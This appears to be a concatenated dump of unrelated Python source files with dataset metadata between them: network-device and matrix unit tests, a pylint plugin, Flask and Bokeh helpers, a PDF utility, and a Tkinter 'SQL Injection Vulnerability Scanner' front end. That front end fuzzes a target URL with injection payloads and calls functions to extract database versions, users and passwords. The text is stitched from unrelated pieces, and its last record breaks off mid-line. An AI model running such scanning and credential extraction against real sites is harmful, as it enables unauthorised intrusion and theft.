password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.get.assert_called_with('bootflash:source_file', '/path/to/source_file')
mock_SCP.return_value.close.assert_called_with()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_error_local_not_exist(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = False
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
with self.assertRaises(FileTransferError):
self.fc.send()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_error_not_enough_space(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = False
mock_ssh = mock_paramiko.SSHClient.return_value
with self.assertRaises(FileTransferError):
self.fc.send()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_transfer_error(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
mock_SCP.return_value.put.side_effect = Exception
with self.assertRaises(FileTransferError):
self.fc.send()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.put.assert_called_with('/path/to/source_file', 'bootflash:source_file')
mock_SCP.return_value.close.assert_called_with()
if __name__ == "__main__":
unittest.main()
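A minimal usage sketch of the class exercised by these tests; the Device and FileCopy constructor arguments below are assumptions about the pynxos API rather than something shown in this test module.
from pynxos.device import Device
from pynxos.features.file_copy import FileCopy, FileTransferError

# Placeholder credentials and paths -- adjust to your environment.
device = Device(host='10.0.0.1', username='admin', password='secret')
fc = FileCopy(device, '/path/to/source_file')   # assumed constructor shape

try:
    if not fc.remote_file_exists():
        fc.send()   # copies the file to bootflash: over SCP/SSH, as mocked above
except FileTransferError as exc:
    print('transfer failed:', exc)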
| 19,245
| 2,313
| 23
|
1ba7e9d00ac9ddde32d332f71e982fac582852a8
| 1,154
|
py
|
Python
|
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | 1
|
2017-12-08T15:55:17.000Z
|
2017-12-08T15:55:17.000Z
|
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | null | null | null |
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | null | null | null |
"""Jeff Bay's Object Calisthenics Rules."""
# 1. One level of indentation per method
# * Pylint's "checkers.refactoring", max-nested-blocks=1
# * Pylint's "checkers.design_analysis", max-branches=1
# * DONE
# 2. Don't use the ELSE keyword
import checkers.no_else
# * also Pylint's "checkers.refactoring", max-nested-blocks=1
# * DONE
# 3. Wrap all primitives and Strings
# 4. First class collections
import checkers.first_class_collections
# * knows [], (), list(), set() and comprehensions.
# TODO add support for more types of collections
# * (kind of) DONE
# 5. One dot per line
import checkers.one_dot_per_line
# * DONE
# 6. Don't abbreviate
# TODO short names
# * good-names=reset
# 7. Keep all entities small
import checkers.small_entities
# * no class over 45 statements, no module over 10 classes, no module over 45 statements.
# * (kind of) DONE
# 8. No classes with more than two instance variables
import checkers.two_instance_variables
# * also Pylint's "checkers.design_analysis", max-attributes=2
# * DONE
# 9. No getters/setters/properties
import checkers.no_properties
# TODO do not use manual getters/setters
# * (kind of) DONE
| 26.837209
| 89
| 0.738302
|
"""Jeff Bay's Object Calisthenics Rules."""
# 1. One level of indentation per method
# * Pylint's "checkers.refactoring", max-nested-blocks=1
# * Pylint's "checkers.design_analysis", max-branches=1
# * DONE
# 2. Don't use the ELSE keyword
import checkers.no_else
# * also Pylint's "checkers.refactoring", max-nested-blocks=1
# * DONE
# 3. Wrap all primitives and Strings
# 4. First class collections
import checkers.first_class_collections
# * knows [], (), list(), set() and comprehensions.
# TODO add support for more types of collections
# * (kind of) DONE
# 5. One dot per line
import checkers.one_dot_per_line
# * DONE
# 6. Don't abbreviate
# TODO short names
# * good-names=reset
# 7. Keep all entities small
import checkers.small_entities
# * no class over 45 statements, no module over 10 classes, no module over 45 statements.
# * (kind of) DONE
# 8. No classes with more than two instance variables
import checkers.two_instance_variables
# * also Pylint's "checkers.design_analysis", max-attributes=2
# * DONE
# 9. No getters/setters/properties
import checkers.no_properties
# TODO do not use manual getters/setters
# * (kind of) DONE
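For illustration only (not part of the plugin), here is the kind of refactoring that rules 2 and 5 push towards, assuming a hypothetical order object with a customer attribute.
# Violates rule 2 (uses ELSE) and rule 5 (two dots in one expression):
def describe_with_else(order):
    if order.customer.is_vip():
        return 'vip'
    else:
        return 'regular'

# Compliant version: early return instead of ELSE, one dot per line.
def describe_no_else(order):
    customer = order.customer
    if customer.is_vip():
        return 'vip'
    return 'regular'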
| 0
| 0
| 0
|
0892a02aefb143a24befa8f3ebf7c11b8155f8f2
| 1,794
|
py
|
Python
|
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
# © 2020 Amgen Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# function to help parse query params from bokeh server url
DEFAULT_PLOT_HEIGHT = 500
DEFAULT_PLOT_WIDTH = 800
| 32.618182
| 105
| 0.672241
|
# © 2020 Amgen Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# function to help parse query params from bokeh server url
DEFAULT_PLOT_HEIGHT = 500
DEFAULT_PLOT_WIDTH = 800
def parse_args(args):
try:
height = int(args.get('height')[0])
except:
height = DEFAULT_PLOT_HEIGHT
try:
width = int(args.get('width')[0])
except:
width = DEFAULT_PLOT_WIDTH
try:
labeling_job_name = args.get('labeling_job_name')[0].decode('utf-8')
except:
print('A labeling job query parameter is required e.g, labeling_job_name=a-test-job-name')
exit(1)
try:
bucket = args.get('bucket')[0].decode('utf-8')
except:
print('A bucket query parameter is required e.g, bucket=an-s3-bucket-name')
exit(1)
try:
prefix = args.get('prefix')[0].decode('utf-8')
except:
print('A prefix parameter is required e.g, prefix=a/prefix/job-name/annotations/worker-response')
exit(1)
try:
user_pool_id = args.get('user_pool_id')[0].decode('utf-8')
except:
print('A user_pool_id parameter is required e.g, user_pool_id=us-west-2_adfsdasf')
exit(1)
return height, width, labeling_job_name, bucket, prefix, user_pool_id
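For context, a sketch of how parse_args() is typically fed from inside a Bokeh server document; curdoc().session_context.request.arguments yields the query parameters as a dict of byte-string lists, which matches the .decode('utf-8') calls above.
from bokeh.io import curdoc

# Query parameters of the current Bokeh server session.
args = curdoc().session_context.request.arguments
height, width, labeling_job_name, bucket, prefix, user_pool_id = parse_args(args)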
| 1,062
| 0
| 23
|
f7e47ef168d23cb2dc99e0ac2263c621df593dbd
| 132
|
py
|
Python
|
server/src/resources/__init__.py
|
AlexandreBattut/centrale
|
28d1aa53abb88e7ffb87ee1d64cb698a2c76402a
|
[
"MIT"
] | null | null | null |
server/src/resources/__init__.py
|
AlexandreBattut/centrale
|
28d1aa53abb88e7ffb87ee1d64cb698a2c76402a
|
[
"MIT"
] | null | null | null |
server/src/resources/__init__.py
|
AlexandreBattut/centrale
|
28d1aa53abb88e7ffb87ee1d64cb698a2c76402a
|
[
"MIT"
] | null | null | null |
from .user import UserResource
from .movie import MovieResource, MovieAuthorResource
from .note import NoteResource, NoteAllResource
| 33
| 52
| 0.863636
|
from .user import UserResource
from .movie import MovieResource, MovieAuthorResource
from .note import NoteResource, NoteAllResource
| 0
| 0
| 0
|
ae7b9a5ad2f42b1085d8218767395ee08e327173
| 5,994
|
py
|
Python
|
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | null | null | null |
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | null | null | null |
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | 1
|
2018-10-28T17:47:24.000Z
|
2018-10-28T17:47:24.000Z
|
from Tkinter import *
from tkMessageBox import *
from tkFileDialog import *
from SQLinjector import *
import time
import websitedata
Home()
| 41.625
| 127
| 0.656823
|
from Tkinter import *
from tkMessageBox import *
from tkFileDialog import *
from SQLinjector import *
import time
import websitedata
def checkvuln(wsite,name):
inject=[]
global result
for x in name:
sqlinject=x
inject.append(wsite.replace("FUZZ",sqlinject))
showinfo('Wait'," Checking website for vulnerability please wait")
result=injector(inject)
process()
def deepXploit():
global columns
global version
global curr_user
global steal_usr
global passwrd
columns=detect_columns(wsite)
version=detect_version(wsite)
curr_user=detect_user(wsite)
steal_usr,passwrd=steal_users(wsite)
def xploit():
pro.destroy()
xploy=Tk()
    showinfo('Exploit', "Website is under deep exploitation, please wait...")
xploy.geometry('1024x577')
xploy.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
xploy.title("SQL Injection Vulnerability Scanner")
Label(xploy,image=pic).grid(row=0,column=0,rowspan=20,columnspan=10)
Label(xploy,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Label(xploy,text='Results:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0)
Label(xploy,text='No. of columns:-', font='Harrington 14 bold underline' ,bg='white').grid(row=6,column=0)
Label(xploy,text='Version:-', font='Harrington 14 bold underline' ,bg='white').grid(row=7,column=0)
Label(xploy,text='Current Database User:-', font='Harrington 14 bold underline' ,bg='white').grid(row=8,column=0)
## Label(xploy,text='Usernames & passwords:-', font='Harrington 14 bold underline' ,bg='white').grid(row=10,column=0)
for x in columns:
Label(xploy, text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=6,column=(1+(int(columns.index(x)))))
## xploy.mainloop()
Label(xploy, text=version,font='Harrington 14 bold underline',bg='white').grid(row=7,column=1)
Label(xploy, text=curr_user,font='Harrington 14 bold underline' ,bg='white').grid(row=8,column=1)
## for x in steal_usr:
## Label(xploy,text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=10,column=(1+(int(steal_usr.index(x)))))
## xploy.mainloop()
## for x in passwrd:
## Label(xploy,text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=11,column=(1+(int(passwrd.index(x)))))
## xploy.mainloop()
xploy.mainloop()
def report():
p1.destroy()
global rep
rep=Tk()
rep.geometry('1024x577')
rep.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
rep.title("SQL Injection Vulnerability Scanner")
Label(rep,image=pic).grid(row=0,column=0,rowspan=10,columnspan=10)
Label(rep,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Button(rep, text="back", bg='white', command=repback).grid(row=1, column=8)
Label(rep,text='Report:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0)
rep.mainloop()
def repback():
rep.destroy()
Home()
def process():
global pro
p1.destroy()
pro=Tk()
pro.geometry('1024x577')
pro.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
Label(pro,image=pic).grid(row=0,column=0,rowspan=20,columnspan=10)
pro.title("SQL Injection Vulnerability Scanner")
Label(pro,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=1,column=0,columnspan=10)
Label(pro,text='Processing:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0,sticky='W')
Label(pro,text='Testing errors:-', font='Harrington 14 bold ' ,bg='white').grid(row=3,column=0,sticky='W')
'''def testres(wsite,name):
inject=[]
for z in name:
y=(wsite.replace("FUZZ",z))
Label(pro,text='' , bg='white').grid(row=4,column=0,sticky='EWNS')
Label(pro,text=y, bg='white').grid(row=4,column=0,sticky='EW')
break'''
global i
i=int(0)
for x in result:
i=int(i+1)
Label(pro,text=x,font='Harrington 12 bold',bg='white').grid(row=5+i,column=0,sticky='NS')
if (len(result) != 0):
showinfo('Results','Website is vulnerable to sql injection')
Button(pro,text='Exploit',bg='white',command=lambda:[deepXploit(),xploit(),]).grid(row=10,column=5,sticky='W')
else :
showinfo('Results','Website is not vulnerable to sql injection')
pro.mainloop()
def checkres():
if not result:
showinfo('Results',"Not vulnerable")
def Home():
global p1
p1=Tk()
global s
p1.geometry('1024x577')
p1.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
Label(p1,image=pic).grid(row=0,column=0,rowspan=10,columnspan=10)
p1.title("SQL Injection Vulnerability Scanner")
Label(p1,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Label(p1,text='Website:', font='Harrington 14 bold' ,bg='white').grid(row=2,column=0)
s=Entry(p1,bg='LightCyan4', cursor='dot')
s.grid(row=2,column=1,columnspan=5,sticky='EW')
Label(p1,text='Injection file select:', font='Harrington 14 bold' ,bg='white').grid(row=8,column=0)
def fileselect():
injectionfile=askopenfilename(title = "Select injection dictionary file",filetypes = (("text files","*.txt"),))
f = open(injectionfile, "r")
global name
name = f.read().splitlines()
print(name)
def webget():
global wsite
wsite=str(s.get()+"FUZZ")
print(wsite)
Button(p1, text='select file', command=fileselect, bg='white', cursor='dot').grid(row=8, column=1)
Button(p1, text="Check",bg='white',command=lambda:[webget(),checkvuln(wsite,name),]).grid(row=6,column=8, sticky='EWNS')
p1.mainloop()
Home()
| 5,646
| 0
| 199
|
1f013a9bb78006e16890563e1f2078779f4852ab
| 3,131
|
py
|
Python
|
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2019 Mobvoi AI Lab, Beijing, China (author: Fangjun Kuang)
# Apache 2.0
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import unittest
import numpy as np
import kaldi
if __name__ == '__main__':
unittest.main()
| 29.537736
| 71
| 0.545513
|
#!/usr/bin/env python3
# Copyright 2019 Mobvoi AI Lab, Beijing, China (author: Fangjun Kuang)
# Apache 2.0
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import unittest
import numpy as np
import kaldi
class TestFloatSubMatrix(unittest.TestCase):
def test_from_numpy(self):
num_rows = 5
num_cols = 6
data = np.arange(num_rows * num_cols).reshape(
num_rows, num_cols).astype(np.float32)
# =============================================================
# build a FloatSubMatrix() from a numpy array; memory is shared
# -------------------------------------------------------------
m = kaldi.FloatSubMatrix(data)
self.assertEqual(m.NumRows(), num_rows)
self.assertEqual(m.NumCols(), num_cols)
self.assertEqual(m.Stride(), data.strides[0] / 4)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(m[r, c], data[r, c])
# memory is shared between numpy array and FloatSubMatrix
for r in range(num_rows):
for c in range(num_cols):
m[r, c] += 10
self.assertEqual(m[r, c], data[r, c])
# =============================================================
# Convert a FloatSubMatrix to a numpy array; memory is shared
# -------------------------------------------------------------
m_reference_count = sys.getrefcount(m)
d = m.numpy()
self.assertEqual(m_reference_count + 1, sys.getrefcount(m))
d += 10 # m is also changed because of memory sharing
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(d[r, c], m[r, c])
del d
self.assertEqual(m_reference_count, sys.getrefcount(m))
class TestFloatMatrix(unittest.TestCase):
def test_to_numpy(self):
# first, build a kaldi matrix
num_rows = 6
num_cols = 8
m = kaldi.FloatMatrix(row=num_rows, col=num_cols)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(m[r, c], 0)
m_reference_count = sys.getrefcount(m)
# now to numpy; memory is shared
d = m.numpy()
self.assertEqual(m_reference_count + 1, sys.getrefcount(m))
d += 10
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(d[r, c], m[r, c])
del d
self.assertEqual(m_reference_count, sys.getrefcount(m))
class TestGeneralMatrix(unittest.TestCase):
def test_from_base_matrix(self):
num_rows = 5
num_cols = 6
m = kaldi.FloatMatrix(row=num_rows, col=num_cols)
mg = kaldi.GeneralMatrix(m)
mi = kaldi.FloatMatrix()
mg.GetMatrix(mi)
self.assertEqual(mi.NumRows(), num_rows)
self.assertEqual(mi.NumCols(), num_cols)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(mi[r, c], 0)
if __name__ == '__main__':
unittest.main()
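A condensed sketch of the memory-sharing behaviour the tests above exercise, assuming the same kaldi pybind module is importable.
import numpy as np
import kaldi

data = np.zeros((2, 3), dtype=np.float32)
m = kaldi.FloatSubMatrix(data)    # wraps the numpy buffer, no copy
m[0, 0] = 42.0
assert data[0, 0] == 42.0         # the change is visible through the numpy array
assert np.all(m.numpy() == data)  # the reverse view shares the same memory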
| 2,612
| 65
| 150
|
17e2ec4a244bb94a85b8daab658bef83ab4ca1af
| 1,982
|
py
|
Python
|
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, request, render_template, jsonify
from flask_login import current_user
from src.controllers.supporting_lists.manage_lists import manage, update_item
from src.models.type import TypeDataAccess
from src.models.tag import TagDataAccess
from src.models.research_group import *
from src.models.study_field import *
from src.models.employee import *
from src.models.db import get_db
bp = Blueprint('manage_lists', __name__)
@bp.route('/modify-lists', methods=["GET", "POST"])
def modify_lists():
"""
Handles the GET & POST request to '/modify-lists'.
GET: requests to render page
POST: request managing sent data
:return: Json with failure status / template rendering / function call to manage data
"""
if not current_user.is_authenticated or current_user.role == "student":
return jsonify({'success': False}), 400, {'ContentType': 'application/json'}
if request.method == "GET":
return render_template('supporting_lists.html')
else:
return manage(request.json)
@bp.route('/get-all-list-data', methods=['GET'])
def get_all_list_data():
"""
Handles the GET request to '/get-all-list-data'.
:return: Json with all list data
"""
conn = get_db()
all_types = TypeDataAccess(conn).get_types(False)
all_tags = TagDataAccess(conn).get_tags()
all_groups = ResearchGroupDataAccess(conn).get_research_groups(False)
all_employees = EmployeeDataAccess(conn).get_employees(False)
result = {
"types": [obj.to_dict() for obj in all_types],
"tags": all_tags,
"research groups": [obj.to_dict() for obj in all_groups],
"employees": [obj.to_dict() for obj in all_employees]
}
return jsonify(result)
@bp.route("/update-profile", methods=["POST"])
def update_profile():
"""
Handles the POST request to '/update-profile'.
:return: function call to update_item with sent data
"""
return update_item(request.json)
| 33.033333
| 89
| 0.701816
|
from flask import Blueprint, request, render_template, jsonify
from flask_login import current_user
from src.controllers.supporting_lists.manage_lists import manage, update_item
from src.models.type import TypeDataAccess
from src.models.tag import TagDataAccess
from src.models.research_group import *
from src.models.study_field import *
from src.models.employee import *
from src.models.db import get_db
bp = Blueprint('manage_lists', __name__)
@bp.route('/modify-lists', methods=["GET", "POST"])
def modify_lists():
"""
Handles the GET & POST request to '/modify-lists'.
GET: requests to render page
POST: request managing sent data
:return: Json with failure status / template rendering / function call to manage data
"""
if not current_user.is_authenticated or current_user.role == "student":
return jsonify({'success': False}), 400, {'ContentType': 'application/json'}
if request.method == "GET":
return render_template('supporting_lists.html')
else:
return manage(request.json)
@bp.route('/get-all-list-data', methods=['GET'])
def get_all_list_data():
"""
Handles the GET request to '/get-all-list-data'.
:return: Json with all list data
"""
conn = get_db()
all_types = TypeDataAccess(conn).get_types(False)
all_tags = TagDataAccess(conn).get_tags()
all_groups = ResearchGroupDataAccess(conn).get_research_groups(False)
all_employees = EmployeeDataAccess(conn).get_employees(False)
result = {
"types": [obj.to_dict() for obj in all_types],
"tags": all_tags,
"research groups": [obj.to_dict() for obj in all_groups],
"employees": [obj.to_dict() for obj in all_employees]
}
return jsonify(result)
@bp.route("/update-profile", methods=["POST"])
def update_profile():
"""
Handles the POST request to '/update-profile'.
:return: function call to update_item with sent data
"""
return update_item(request.json)
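A short sketch of wiring the blueprint into an application; the import path is inferred from the repository layout and may differ in the real project.
from flask import Flask
from src.controllers.supporting_lists.controller import bp as manage_lists_bp

app = Flask(__name__)
app.register_blueprint(manage_lists_bp)
# Routes now served: /modify-lists, /get-all-list-data, /update-profile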
| 0
| 0
| 0
|
5e309a053528b67904d5d5112db0bd96f00b89b5
| 1,204
|
py
|
Python
|
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | 8
|
2020-12-28T12:49:50.000Z
|
2021-04-12T13:49:19.000Z
|
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | null | null | null |
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | 4
|
2021-01-12T07:48:11.000Z
|
2021-04-12T13:49:21.000Z
|
# -*- coding: utf-8 -*-
# @Author: ander
# @Date: 2020-12-22 16:19:51
# @Last Modified by: ander
# @Last Modified time: 2020-12-22 16:25:49
import pdfplumber
from PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger
import os.path
from .utilities import mkdir
class PDFBot(object):
"""docstring for ExcelBot"""
| 30.1
| 85
| 0.649502
|
# -*- coding: utf-8 -*-
# @Author: ander
# @Date: 2020-12-22 16:19:51
# @Last Modified by: ander
# @Last Modified time: 2020-12-22 16:25:49
import pdfplumber
from PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger
import os.path
from .utilities import mkdir
class PDFBot(object):
"""docstring for ExcelBot"""
def __init__(self):
self.page_num = 0
def open(self, file_path):
self.filename, _ = os.path.splitext(os.path.basename(file_path))
self.pdf = pdfplumber.open(file_path)
self.pdf_reader = PdfFileReader(file_path)
self.page_num = self.pdf_reader.getNumPages()
def get_text(self, page):
pdf_page = self.pdf.pages[page]
return pdf_page.extract_text()
def split(self, page, folder):
mkdir(folder)
pdf_writer = PdfFileWriter()
pdf_writer.addPage(self.pdf_reader.getPage(page))
with open(os.path.join(folder, f"{self.filename}-p{page}.pdf"), "wb") as out:
pdf_writer.write(out)
def merge(self, pdfs, merged_name):
merger = PdfFileMerger()
for pdf in pdfs:
merger.append(PdfFileReader(pdf))
merger.write(f"{merged_name}.pdf")
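An illustrative usage sketch of the class above; all file names are placeholders.
bot = PDFBot()
bot.open('report.pdf')
print(bot.page_num, 'pages')
print(bot.get_text(0))                      # text of the first page
bot.split(0, 'out_pages')                   # writes out_pages/report-p0.pdf
bot.merge(['a.pdf', 'b.pdf'], 'combined')   # writes combined.pdf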
| 743
| 0
| 135
|
7d8042e0a0e082248ae3fb8d16b1773619abf452
| 3,510
|
py
|
Python
|
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
from unittest import TestCase
import mock
from hpOneView.connection import connection
from hpOneView.resources.settings.backups import Backups
from hpOneView.resources.resource import ResourceClient
| 35.454545
| 118
| 0.74188
|
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
from unittest import TestCase
import mock
from hpOneView.connection import connection
from hpOneView.resources.settings.backups import Backups
from hpOneView.resources.resource import ResourceClient
class BackupsTest(TestCase):
def setUp(self):
self.host = '127.0.0.1'
self.connection = connection(self.host)
self._client = Backups(self.connection)
@mock.patch.object(ResourceClient, 'get_collection')
def test_get_all_called_once(self, mock_get_collection):
self._client.get_all()
mock_get_collection.assert_called_once_with('/rest/backups')
@mock.patch.object(ResourceClient, 'get')
def test_get_called_once(self, mock_get):
self._client.get('appliance_backup_2017-04-20_180138')
mock_get.assert_called_once_with('appliance_backup_2017-04-20_180138')
@mock.patch.object(ResourceClient, 'get')
def test_get_with_uri_called_once(self, mock_get):
uri = '/rest/backups/appliance_backup_2017-04-20_180138'
self._client.get(uri)
mock_get.assert_called_once_with(uri)
@mock.patch.object(ResourceClient, 'create_with_zero_body')
def test_create_called_once(self, mock_create):
mock_create.return_value = {}
self._client.create()
mock_create.assert_called_once_with(timeout=-1)
@mock.patch.object(ResourceClient, 'download')
def test_download_called_once_by_id(self, mock_download):
download_uri = '/rest/backups/archive/appliance_backup_2017-04-20_182809'
destination = 'appliance_backup_2017-04-20_180138.bkp'
self._client.download(download_uri, destination)
mock_download.assert_called_once_with('/rest/backups/archive/appliance_backup_2017-04-20_182809', destination)
@mock.patch.object(ResourceClient, 'upload')
def test_upload_artifact_bundle_called_once(self, mock_upload):
filepath = "appliance_backup_2017-04-20_182809.bkp"
self._client.upload(filepath)
mock_upload.assert_called_once_with(filepath)
@mock.patch.object(ResourceClient, 'get')
def test_get_config_called_once(self, mock_get):
self._client.get_config()
mock_get.assert_called_once_with('config')
@mock.patch.object(ResourceClient, 'update')
def test_update_config_called_once(self, mock_update):
options = {"enabled": False}
self._client.update_config(options, timeout=30)
mock_update.assert_called_once_with(options, uri='/rest/backups/config', timeout=30)
@mock.patch.object(ResourceClient, 'update_with_zero_body')
def test_update_remote_archive_called_once(self, mock_update):
save_uri = '/rest/backups/remotearchive/appliance_backup_2017-04-20_182809'
self._client.update_remote_archive(save_uri, timeout=30)
mock_update.update_with_zero_body(uri=save_uri, timeout=30)
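A hedged usage sketch of the client these tests mock; the hostname is a placeholder, and a real appliance session would also need authentication, which is omitted here.
from hpOneView.connection import connection
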